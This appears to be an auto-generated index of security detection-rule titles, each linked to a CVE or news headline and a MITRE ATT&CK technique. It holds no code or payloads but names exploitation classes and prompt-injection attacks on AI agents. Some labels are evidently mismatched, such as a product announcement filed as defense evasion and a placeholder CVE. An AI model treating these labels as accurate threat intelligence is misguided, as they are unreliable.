Auto-generated from ngtcp2 QUIC Stack Overflow: A Critical Vulnerability for ...
🛡️ 1 more rules via /detect
CVE-2023-33538: Mirai Command Injection on TP-Link Routers
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2023-33538: Mirai Botnet Targets TP-Link Routers
🛡️ 2 more rules via /detect
Exploitation Attempt — National Institute of Standards and Technology
Breach Intelvulnerability — event-type
Auto-generated from NIST Overhauls CVE Framework for High-Impact Vulnerabilit...
CVE-2026-6442: Snowflake Cortex Code CLI Bash Command Injection
🌐 NVDT1204.002 — Execution
Auto-generated from Snowflake Cortex Code CLI Sandbox Escape Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-41082 - OCaml opam Path Traversal Attempt
🌐 NVDT1574.006 — Persistence
Auto-generated from OCaml opam Path Traversal: A Nasty CVE-2026-41082
🛡️ 2 more rules via /detect
PowMix Botnet C2 Beaconing - DNS
Breach IntelT1071.004 — Command and Control
Auto-generated from PowMix Botnet Targets Czech Workforce with Evasive C2
🛡️ 2 more rules via /detect
Initial Access - Marimo Vulnerability Exploitation via Hugging Face
Breach IntelT1190 — Initial Access
Auto-generated from Hackers Exploit Marimo Flaw, Deploy NKAbuse via Hugging Face
🛡️ 2 more rules via /detect
Zoho ManageEngine Log360 Auth Bypass - CVE-2026-3324
🌐 NVDT1190 — Initial Access
Auto-generated from Zoho ManageEngine Log360 Hit by Auth Bypass
🛡️ 2 more rules via /detect
Potential Middleware Bypass via Double Slashes - CVE-2026-33804
🌐 NVDT1190 — Initial Access
Auto-generated from Fastify Middie Bypass: Double Slashes, Double Trouble
🛡️ 2 more rules via /detect
CVE-2026-6270 - Fastify Middie Auth Bypass via Unauthenticated Child Route Access
🌐 NVDT1190 — Initial Access
Auto-generated from Fastify Middleware Flaw Exposes Apps to Auth Bypass
🛡️ 2 more rules via /detect
CVE-2026-5785 Zoho ManageEngine PAM/PMP SQL Injection in Query Report
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Flaw Found in Zoho ManageEngine PAM/PMP
🛡️ 2 more rules via /detect
CVE-2026-31843 - Unauthenticated RCE via Laravel Payment Package
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Laravel Payment Package
🛡️ 2 more rules via /detect
Microsoft Defender Zero-Day Exploitation Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Defender 0-Day & Excel RCE Among Week's Top Threats
🛡️ 2 more rules via /detect
Rhysida Ransomware Data Exfiltration - UNC Path Access
Breach IntelT1486 — Impact
Auto-generated from Rhysida Ransomware Hits Tennessee Hospital, Leaks 500GB Data
🛡️ 2 more rules via /detect
CVE-2026-3489 - DirectoryPress Plugin SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from DirectoryPress Plugin Flaw Exposes WordPress Sites to SQL...
🛡️ 2 more rules via /detect
Cisco Webex Improper Certificate Validation Exploit Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Cisco Webex Flaw Demands Immediate Customer Action
🛡️ 1 more rules via /detect
Suspicious Service Account Activity - Orphaned Identity Threat
Breach IntelT1550 — Credential Access
Auto-generated from Orphaned Identities Fueling Cloud Breaches: The Unseen Th...
🛡️ 2 more rules via /detect
CVE-2026-20184 - Cisco Identity Services SSO Improper Certificate Validation
Breach IntelT1190 — Initial Access
Auto-generated from Cisco Patches Critical Flaws in Identity Services and Webex
🛡️ 1 more rules via /detect
PHANTOMPULSE RAT - Malicious Obsidian Plugin Installation
Breach IntelT1190 — Initial Access
Auto-generated from Obsidian Plugin Abuse Unleashes Novel PHANTOMPULSE RAT
🛡️ 2 more rules via /detect
CISA KEV Catalog - NIST NVD Prioritization - Advisory
Breach IntelT1190 — Initial Access
Auto-generated from NIST NVD Prioritizes CISA KEV and Critical Software CVEs
Monitor Authentication from Breached Vendor — McGraw Hill
Breach Inteldata-breach — event-type
Auto-generated from McGraw Hill Breach: 13.5 Million Accounts Leaked by Shiny...
🛡️ 1 more rules via /detect
CVE-2026-23772: Dell Storage Manager Replay Manager Privilege Escalation
🌐 NVDT1548 — Privilege Escalation
Auto-generated from Dell Storage Manager Flaw: Local Privilege Escalation Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2024-2374
🌐 NVDT1190 — Initial Access
Auto-generated from WSO2 XML Parsers Vulnerable to External Entity Attacks
🛡️ 2 more rules via /detect
AI 'Comment and Control' Prompt Injection via Code Comments
Breach IntelT1539 — Execution
Auto-generated from AI Agents Vulnerable to 'Comment and Control' Prompt Inje...
🛡️ 3 more rules via /detect
CVE-2025-14868 - WordPress Career Section Plugin Arbitrary File Deletion via CSRF
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Zero-Day: CSRF to Arbitrary File Deletion
🛡️ 2 more rules via /detect
CVE-2026-41035 - Rsync Use-After-Free via Extended Attributes
🌐 NVDT1190 — Initial Access
Auto-generated from Rsync Vulnerability Exposes Users to Use-After-Free Flaw
🛡️ 2 more rules via /detect
CVE-2026-3876 - WordPress Prismatic Plugin Stored XSS via Pseudo-Shortcode
🌐 NVDT1190 — Initial Access
Auto-generated from Prismatic Plugin Flaw Exposes WordPress Sites to XSS Attacks
🛡️ 1 more rules via /detect
CVE-2026-1620 - Livemesh Addons for Elementor LFI Exploit Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Elementor Addon Vulnerability Exposes WordPress Sites to RCE
🛡️ 2 more rules via /detect
UAC-0247 Malware Exfiltrating Chromium Browser Data
Breach IntelT1041 — Exfiltration
Auto-generated from Malware Campaign Hits Ukrainian Clinics, Government Agencies
🛡️ 2 more rules via /detect
Redsys & WooCommerce Lite Payment Forgery - CVE-2026-5050
🌐 NVDT1190 — Initial Access
Auto-generated from Redsys & WooCommerce Flaw Allows Payment Forgery
WordPress AcyMailing Plugin Subscriber Privilege Escalation - CVE-2026-3614
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from WordPress Plugin Flaw Lets Subscribers Hijack Admin Accounts
🛡️ 2 more rules via /detect
CVE-2026-3599 - Riaxe Product Customizer SQL Injection via add-item-to-cart
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Riaxe Plugin Rife with SQLi Vulnerability
🛡️ 1 more rules via /detect
CVE-2026-3596 - Riaxe Product Customizer Unauthenticated AJAX Action
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Critical WordPress Plugin Flaw: Riaxe Product Customizer ...
🛡️ 2 more rules via /detect
CVE-2026-22619 - Eaton IPP Insecure Library Loading
🌐 NVDT1574.002 — Execution
Auto-generated from Eaton IPP Vulnerability Opens Door for Code Execution
🛡️ 2 more rules via /detect
Festo MSE6 Undocumented Test Mode Access - CVE-2023-3634
🌐 NVDT1190 — Initial Access
Auto-generated from Festo MSE6 Products Vulnerable to High-Severity Remote Ex...
🛡️ 2 more rules via /detect
CVE-2026-6351 - MailGates/MailAudit CRLF Injection for File Disclosure
🌐 NVDT1190 — Initial Access
Auto-generated from MailGates/MailAudit CRLF Injection Exposes System Files
🛡️ 2 more rules via /detect
CVE-2026-6350 Openfind MailGates Stack Buffer Overflow - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from Critical MailGates Flaw Lets Attackers Run Wild
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6348
🌐 NVDT1190 — Initial Access
Auto-generated from WinMatrix Agent: Local Auth Bypass to SYSTEM Privileges
🛡️ 2 more rules via /detect
CVE-2026-41015 - Radare2 rabin2 PDB Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Radare2 Vulnerability: Command Injection via PDB Name
🛡️ 2 more rules via /detect
CVE-2026-40504 - Gravity Heap Overflow via Malicious Script Execution
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Heap Overflow in Creolabs Gravity Exposes Arbitr...
🛡️ 1 more rules via /detect
CVE-2026-40960 - Luanti Trusted/HTTP Module Exploitation
🌐 NVDT1190 — Initial Access
Auto-generated from Luanti Vulnerability Exposes Insecure Environments via Cr...
🛡️ 2 more rules via /detect
CVE-2026-40959 - Lua Sandbox Escape via Crafted Mod
🌐 NVDT1190 — Initial Access
Auto-generated from Critical LuaJIT Sandbox Escape in Luanti 5
🛡️ 2 more rules via /detect
CVE-2026-40502 OpenHarness Command Injection via Chat
🌐 NVDT1204.002 — Execution
Auto-generated from OpenHarness Command Injection: Remote Admin Control Via Chat
🛡️ 2 more rules via /detect
CVE-2026-4880 - WordPress Barcode Scanner Plugin Unauthenticated Admin Privilege Escalation
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Critical WordPress Plugin Flaw Grants Admin Privileges
🛡️ 2 more rules via /detect
CVE-2026-40245 Free5GC UDR Subscriber Identifier Leak
🌐 NVDT1190 — Initial Access
Auto-generated from Free5GC UDR Service Leaks 5G Subscriber Identifiers
🛡️ 1 more rules via /detect
CVE-2026-40193: Maddy Mail Server LDAP Injection via AUTH PLAIN/LOGIN
🌐 NVDT1190 — Initial Access
Auto-generated from Maddy Mail Server Hit by Critical LDAP Injection Flaw
🛡️ 2 more rules via /detect
CVE-2026-40316: Malicious Python Import via Regenerate Migrations Workflow
🌐 NVDT1570 — Execution
Auto-generated from OWASP BLT RCE: GitHub Workflow Flaw Exposes Secrets
🛡️ 2 more rules via /detect
ArgoCD Image Updater Cross-Namespace Update Attempt - CVE-2026-6388
🌐 NVDT1531 — Privilege Escalation
Auto-generated from ArgoCD Image Updater Flaw Bypasses Namespace Boundaries
🛡️ 2 more rules via /detect
Composer Command Injection via Malicious Source Reference - CVE-2026-40261
🌐 NVDT1190 — Initial Access
Auto-generated from Composer Command Injection: Malicious Repositories are a ...
🛡️ 2 more rules via /detect
CVE-2026-40173 - Dgraph Unauthenticated Admin Token Disclosure
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Dgraph Flaw Leaks Admin Tokens, Bypassing Authen...
🛡️ 2 more rules via /detect
CVE-2026-22676 - Barracuda RMM SYSTEM Privilege Escalation via Automation Directory
🌐 NVDT1547.001 — Privilege Escalation
Auto-generated from Barracuda RMM Flaw Grants SYSTEM Privileges
🛡️ 2 more rules via /detect
Traffic to Compromised Vendor — WordPress
Breach Intelsupply-chain — event-type
Auto-generated from WordPress EssentialPlugin Suite Compromised, Thousands of...
🛡️ 1 more rules via /detect
Chrome V8 Type Confusion Exploit Attempt - CVE-2026-6363
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome V8 Type Confusion: Remote OOB Access Risk
🛡️ 2 more rules via /detect
CVE-2026-6360 Chrome FileSystem Use-After-Free Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome 'Use-After-Free' Bug: High Severity RCE Risk
🛡️ 2 more rules via /detect
Chrome Use-After-Free RCE Attempt (CVE-2026-6359)
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome Video Bug: Renderer Compromise Leads to High-Sever...
🛡️ 2 more rules via /detect
CVE-2026-6358 Chrome XR Use-After-Free Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Use-After-Free Bug Hits Chrome on Android
🛡️ 2 more rules via /detect
CVE-2026-6317 Chrome Cast Component Use-After-Free
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome 'Use-After-Free' Bug: Remote Code Execution Risk
🛡️ 2 more rules via /detect
CVE-2026-6316 Chrome Use-After-Free Exploit Attempt
🌐 NVDT1203 — Initial Access
Auto-generated from Chrome Zero-Day: Use-After-Free Flaw Exposes Users to RCE
🛡️ 2 more rules via /detect
CVE-2026-6315 Chrome Android Use-After-Free Exploit Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome Android Bug: High-Severity Use-After-Free Exploit
🛡️ 2 more rules via /detect
CVE-2026-6307 Chrome Turbofan Type Confusion RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome Turbofan Bug Allows Remote Code Execution in Sandbox
🛡️ 2 more rules via /detect
Chrome Use-After-Free RCE via Crafted HTML - CVE-2026-6302
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome's 'Use-After-Free' Bug: Remote Code Execution Risk
🛡️ 2 more rules via /detect
Chrome Turbofan Type Confusion RCE - CVE-2026-6301
🌐 NVDT1203 — Execution
Auto-generated from Chrome Turbofan Bug: Remote Code Execution Threat
🛡️ 2 more rules via /detect
Chrome Use-After-Free Exploit Attempt - CVE-2026-6300
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome Zero-Day: Use-After-Free in CSS Poses High Risk
🛡️ 2 more rules via /detect
Chrome Prerender Use-After-Free Exploit Attempt - CVE-2026-6299
🌐 NVDT1203 — Initial Access
Auto-generated from Critical Chrome 'Use-After-Free' Vulnerability Uncovered
🛡️ 2 more rules via /detect
CVE-2026-6297 - Chrome Proxy Use-After-Free leading to Sandbox Escape
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Chrome Proxy Bug Allows Sandbox Escape
🛡️ 2 more rules via /detect
CVE-2026-35569 - ApostropheCMS Stored XSS in SEO Fields
🌐 NVDT1190 — Initial Access
Auto-generated from ApostropheCMS Flaw: Stored XSS Puts User Data at Risk
🛡️ 2 more rules via /detect
CVE-2025-41118 - Pyroscope Tencent COS Secret Key Exposure
🌐 NVDT1078.004 — Credential Access
Auto-generated from Critical RCE in Pyroscope's Tencent COS Backend
🛡️ 2 more rules via /detect
CVE-2026-4857 - IdentityIQ Unauthorized Object Creation via Debug Pages
🌐 NVDT1200 — Privilege Escalation
Auto-generated from IdentityIQ Flaw Allows Unauthorized Object Creation
🛡️ 2 more rules via /detect
CVE-2026-34632 - Photoshop Installer Uncontrolled Search Path Element
🌐 NVDT1204.002 — Execution
Auto-generated from Photoshop Installer Vulnerability Allows Arbitrary Code E...
🛡️ 2 more rules via /detect
WEBLATE CVE-2026-34393 User Patching API Abuse - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Weblate Flaw Exposes User Data, High-Severity Patch Issued
🛡️ 2 more rules via /detect
Weblate ZIP Symlink Traversal Attempt (CVE-2026-34242) - Free Tier
🌐 NVDT1083 — Discovery
Auto-generated from Weblate ZIP Feature Exposes Systems to Symlink Traversal
🛡️ 2 more rules via /detect
OpenProject 2FA Bypass - Brute-Force OTP Verification Attempt - CVE-2026-33667
🌐 NVDT1110.003 — Credential Access
Auto-generated from OpenProject 2FA Bypass: Brute-Force Vulnerability Uncovered
🛡️ 1 more rules via /detect
WEBLATE CVE-2026-33435 Project Backup RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Weblate Vulnerability Allows RCE via Project Backups
🛡️ 2 more rules via /detect
CVE-2026-6290 Velociraptor query() Plugin Cross-Organization Access
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Velociraptor Vulnerability Exposes Multi-Org Data
🛡️ 2 more rules via /detect
CVE-2026-32631 - Git for Windows NTLM Hash Leak via Malicious Clone
🌐 NVDT1552.002 — Credential Access
Auto-generated from Git for Windows NTLM Hash Leak Poses Credential Risk
🛡️ 1 more rules via /detect
Unauthenticated Access Control Bypass via Plisio Plugin - CVE-2026-6372
🌐 NVDT1190 — Initial Access
Auto-generated from Plisio Plugin Flaw: Unauthenticated Access Control Bypass
🛡️ 1 more rules via /detect
CVE-2026-20186 - Cisco ISE Unauthenticated Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Cisco ISE RCE: Authenticated Attackers Can Gain ...
🛡️ 2 more rules via /detect
CVE-2026-20184 Cisco Webex SSO Impersonation Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Cisco Webex SSO Flaw: Critical Impersonation Risk
🛡️ 2 more rules via /detect
CVE-2026-20180 - Cisco ISE Unauthenticated RCE via Crafted HTTP Request
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Cisco ISE RCE: Authenticated Attackers Can Gain ...
🛡️ 2 more rules via /detect
CVE-2026-20247 - Cisco ISE Authenticated RCE via Malicious HTTP Request
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Cisco ISE RCE: Authenticated Admin Can Achieve Root
🛡️ 2 more rules via /detect
CVE-2025-63029 - WCFM Marketplace SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from WCFM Marketplace SQLi: High-Severity Flaw Patched
🛡️ 2 more rules via /detect
Free Tier - n8n Webhook Abuse for Malware Delivery
Breach IntelT1566.002 — Initial Access
Auto-generated from n8n Webhooks Abused for Malware Delivery via Phishing
🛡️ 2 more rules via /detect
CVE-2026-20205 - Splunk MCP Server Session Token Exposure
🌐 NVDT1003 — Credential Access
Auto-generated from Splunk MCP Server Bug Exposes Session Tokens
🛡️ 2 more rules via /detect
CVE-2026-20204 Splunk RCE - Malicious File Upload to apptemp
🌐 NVDT1190 — Initial Access
Auto-generated from Splunk RCE: Low-Privilege Users Could Gain Remote Code Ex...
🛡️ 2 more rules via /detect
Privilege Escalation via Windows Task Host Vulnerability
Breach IntelT1068 — Privilege Escalation
Auto-generated from CISA Flags Exploited Windows Task Host Vulnerability
🛡️ 2 more rules via /detect
Anthropic MCP Unsanitized Command Injection
Breach IntelT1190 — Initial Access
Auto-generated from Anthropic's AI Protocol Has Design Flaw Enabling Supply C...
🛡️ 2 more rules via /detect
CVE-2026-33032 - Nginx-UI Authentication Bypass Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Nginx-UI Flaw CVE-2026-33032 Actively Exploited for Serve...
🛡️ 2 more rules via /detect
Microsoft Copilot Prompt Injection Data Exfiltration
Breach IntelT1539 — Exfiltration
Auto-generated from AI Agents Prone to Data Leaks, Microsoft and Salesforce P...
🛡️ 1 more rules via /detect
ICS Patch Tuesday Advisories - Siemens, Schneider Electric, Rockwell Automation, ABB, Mitsubishi Electric, Moxa, Phoenix Contact, Aveva
Breach IntelT1190 — Initial Access
Auto-generated from ICS Patch Tuesday: Industrial Giants Issue Critical Advis...
🛡️ 2 more rules via /detect
Monitor Authentication from Breached Vendor — Nickelodeon
Breach Inteldata-breach — event-type
Auto-generated from Avatar Aang Leaked: Nickelodeon Breach Rumors Swirl
🛡️ 1 more rules via /detect
Detection of GPT-5.4-Cyber Tool Release Announcement
Breach IntelT1649 — Defense Evasion
Auto-generated from OpenAI Unleashes GPT-5.4-Cyber for Defensive Security
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-39399
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Flaw Hits NuGet Gallery Backend
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-39387
🌐 NVDT1190 — Initial Access
Auto-generated from BoidCMS LFI to RCE: A Critical Template Flaw
🛡️ 3 more rules via /detect
Drive-by Download via Browser — CVE-2026-35589
🌐 NVDT1189 — Initial Access
Auto-generated from Nanobot AI: WebSocket Hijack Puts WhatsApp Sessions at Risk
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35031
🌐 NVDT1190 — Initial Access
Auto-generated from Jellyfin RCE: Critical Flaw Chains Arbitrary File Write t...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34457
🌐 NVDT1190 — Initial Access
Auto-generated from OAuth2 Proxy Auth Bypass Critical Vulnerability (CVE-2026...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33023
🌐 NVDT1190 — Initial Access
Auto-generated from Libsixel Use-After-Free: Crafted Images Lead to RCE
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33021
🌐 NVDT1190 — Initial Access
Auto-generated from libsixel Use-After-Free: High-Severity Bug in Image Handling
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-27290
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe FrameMaker Hit by Untrusted Search Path Flaw
🛡️ 3 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-40291
🌐 NVDT1078.004 — Initial Access
Auto-generated from Chamilo LMS Privilege Escalation: Student to Admin in a Snap
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35196
🌐 NVDT1190 — Initial Access
Auto-generated from Chamilo LMS OS Command Injection: A Session Poisoning Nig...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34619
🌐 NVDT1190 — Initial Access
Auto-generated from ColdFusion Path Traversal Poses High Risk
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-34602
🌐 NVDT1078.004 — Initial Access
Auto-generated from Chamilo LMS IDOR Flaw Exposes User-Course Enrollments
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33020
🌐 NVDT1190 — Initial Access
Auto-generated from Libsixel Integer Overflow Leads to Heap Corruption
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33019
🌐 NVDT1190 — Initial Access
Auto-generated from libsixel Integer Overflow Leads to Heap OOB Read, Info Di...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33018
🌐 NVDT1190 — Initial Access
Auto-generated from libsixel Use-After-Free: Critical Flaw in GIF Processing
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-27305
🌐 NVDT1190 — Initial Access
Auto-generated from ColdFusion Path Traversal Exposes Arbitrary File Reads
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-27304
🌐 NVDT1190 — Initial Access
Auto-generated from ColdFusion Flaw: Critical RCE Threat Looms Large
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-27282
🌐 NVDT1190 — Initial Access
Auto-generated from ColdFusion Flaw Allows Security Bypass
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34160
🌐 NVDT1190 — Initial Access
Auto-generated from Chamilo LMS SSRF: Unauthenticated Attack Poses High Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33715
🌐 NVDT1190 — Initial Access
Auto-generated from Chamilo LMS SSRF Flaw: Unauthenticated Email Relay Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-24893
🌐 NVDT1190 — Initial Access
Auto-generated from openITCOCKPIT Command Injection: RCE for Authenticated Users
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — OpenStack Keystone LDAP Flaw Exposes Dis
🌐 NVDT1190 — Initial Access
Auto-generated from OpenStack Keystone LDAP Flaw Exposes Disabled Users
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Adobe Connect XSS Flaw: Privilege Escala
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Connect XSS Flaw: Privilege Escalation Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Critical Adobe Connect RCE: Deserializat
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Adobe Connect RCE: Deserialization Flaw Puts Use...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — Critical Windows IKE Flaw: Network Code
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Windows IKE Flaw: Network Code Execution Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — SQL Server RCE: Untrusted Pointer Derefe
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Server RCE: Untrusted Pointer Dereference
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Windows Shell Flaw Bypasses Core Securit
🌐 NVDT1190 — Initial Access
Auto-generated from Windows Shell Flaw Bypasses Core Security
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — Azure Logic Apps Flaw: Privilege Escalat
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Azure Logic Apps Flaw: Privilege Escalation Risk
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — RDP Client Vulnerability: Remote Code Ex
🌐 NVDT1190 — Initial Access
Auto-generated from RDP Client Vulnerability: Remote Code Execution via Use-A...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Windows Hello Flaw: Network Bypass Possi
🌐 NVDT1190 — Initial Access
Auto-generated from Windows Hello Flaw: Network Bypass Possible
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Adobe Connect RCE Flaw: Critical Deseria
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Connect RCE Flaw: Critical Deserialization Bug Exposed
🛡️ 3 more rules via /detect
Drive-by Download via Browser — Critical XSS Hits Adobe Connect: Patch N
🌐 NVDT1189 — Initial Access
Auto-generated from Critical XSS Hits Adobe Connect: Patch Now!
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Critical XSS Hits Adobe Connect: Patch N
🌐 NVDT1190 — Initial Access
Auto-generated from Critical XSS Hits Adobe Connect: Patch Now!
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Adobe Connect XSS Flaw: Critical Remote
🌐 NVDT1190 — Initial Access
Auto-generated from Adobe Connect XSS Flaw: Critical Remote Code Execution Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Microsoft Power Apps Flaw: Critical Remo
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Power Apps Flaw: Critical Remote Attack Vector ...
🛡️ 2 more rules via /detect
Exploitation Attempt — Microsoft
Breach Intelvulnerability — event-type
Auto-generated from Microsoft Patches SharePoint Zero-Day, 160 Vulnerabilities
Monitor Authentication from Breached Vendor — McGraw-Hill
Breach Inteldata-breach — event-type
Auto-generated from McGraw-Hill Confirms Breach via Salesforce Misconfig
🛡️ 1 more rules via /detect
Exploitation Attempt — CVE-XXXX-XXXXX
Breach Intelvulnerability — event-type
Auto-generated from Windows 11 Gets Security Boost with Latest Cumulative Upd...
Exploitation Attempt — SAP
Breach Intelvulnerability — event-type
Auto-generated from SAP Patches Critical SQLi and High-Severity ERP Flaws
Web Application Exploitation Attempt — CVE-2026-39815
🌐 NVDT1190 — Initial Access
Auto-generated from Fortinet FortiDDoS-F SQLi: High-Severity RCE Risk
🛡️ 3 more rules via /detect
Exploitation Attempt — Fortinet Path Traversal Flaw: Critical P
🌐 NVDvulnerability — event-type
Auto-generated from Fortinet Path Traversal Flaw: Critical Privilege Escalati...
Credential Abuse from Breached Vendor — CVE-2026-38532
🌐 NVDT1078.004 — Persistence
Auto-generated from CRM Vulnerability Lets Attackers Steal and Delete User Co...
🛡️ 3 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-38530
🌐 NVDT1078.004 — Initial Access
Auto-generated from Webkul Krayin CRM: Critical Auth Flaw Lets Attackers Stea...
🛡️ 1 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-38529
🌐 NVDT1078.004 — Persistence
Auto-generated from Critical BOLA Flaw Lets Attackers Hijack Webkul Krayin CR...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-38528
🌐 NVDT1190 — Initial Access
Auto-generated from Krayin CRM SQL Injection: High-Severity Flaw Exposes Data
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-38526
🌐 NVDT1190 — Initial Access
Auto-generated from Critical File Upload Flaw Found in Webkul Krayin CRM
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-23708
🌐 NVDT1190 — Initial Access
Auto-generated from FortiSOAR 2FA Bypass: Replay Attack Raises Authentication...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-65135
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQLi Hits School Management System
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-63939
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQLi Hits Grocery Store Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-61848
🌐 NVDT1190 — Initial Access
Auto-generated from Fortinet SQLi Hits FortiAnalyzer, FortiManager
🛡️ 3 more rules via /detect
Click on Phishing Link from CVE-2026-4369 Domain
🌐 NVDT1566.002 — Initial Access
Auto-generated from Autodesk Fusion XSS: Local File Read, Code Execution Risk
Click on Phishing Link from CVE-2026-4345 Domain
🌐 NVDT1566.002 — Initial Access
Auto-generated from Autodesk Fusion XSS Flaw Puts Local Files, Code at Risk
Drive-by Download via Browser — CVE-2026-4344
🌐 NVDT1189 — Initial Access
Auto-generated from Autodesk Fusion XSS Flaw Lets Attackers Steal Local Files
Click on Phishing Link from AI Fuels Google Discover Scams with Scar Domain
Breach IntelT1566.002 — Initial Access
Auto-generated from AI Fuels Google Discover Scams with Scareware and Ad Fraud
DNS Tunneling Detection — Google
Breach IntelT1071.004 — Command and Control
Auto-generated from Google Hardens Pixel 10 Modem with Rust DNS Parser
Web Application Exploitation Attempt — CVE-2026-2332
🌐 NVDT1190 — Initial Access
Auto-generated from Jetty HTTP/1.1 Parser Vulnerable to Request Smuggling via...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32201 — Microsoft SharePoint Se
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-32201 — Microsoft SharePoint Server: Microsoft S...
🛡️ 2 more rules via /detect
Click on Phishing Link from CVE-2009-0238 — Microsoft Office: Micros Domain
Breach IntelT1566.002 — Initial Access
Auto-generated from CVE-2009-0238 — Microsoft Office: Microsoft Office Remote...
Web Application Exploitation Attempt — SAP
Breach IntelT1190 — Initial Access
Auto-generated from SAP Patches Critical ABAP Vulnerability
🛡️ 2 more rules via /detect
Exploitation Attempt — Goldman Sachs Sounds Alarm on Anthropic'
Breach Intelvulnerability — event-type
Auto-generated from Goldman Sachs Sounds Alarm on Anthropic's AI Model 'Mythos'
Monitor Authentication from Breached Vendor — RCI Hospitality
Breach Inteldata-breach — event-type
Auto-generated from Nightclub Giant RCI Hospitality Hit by Data Breach
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33892
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-33892: Unauthenticated Remote Access to Siemens ...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-24032
🌐 NVDT1190 — Initial Access
Auto-generated from Authentication Bypass Hits Siemens SINEC NMS
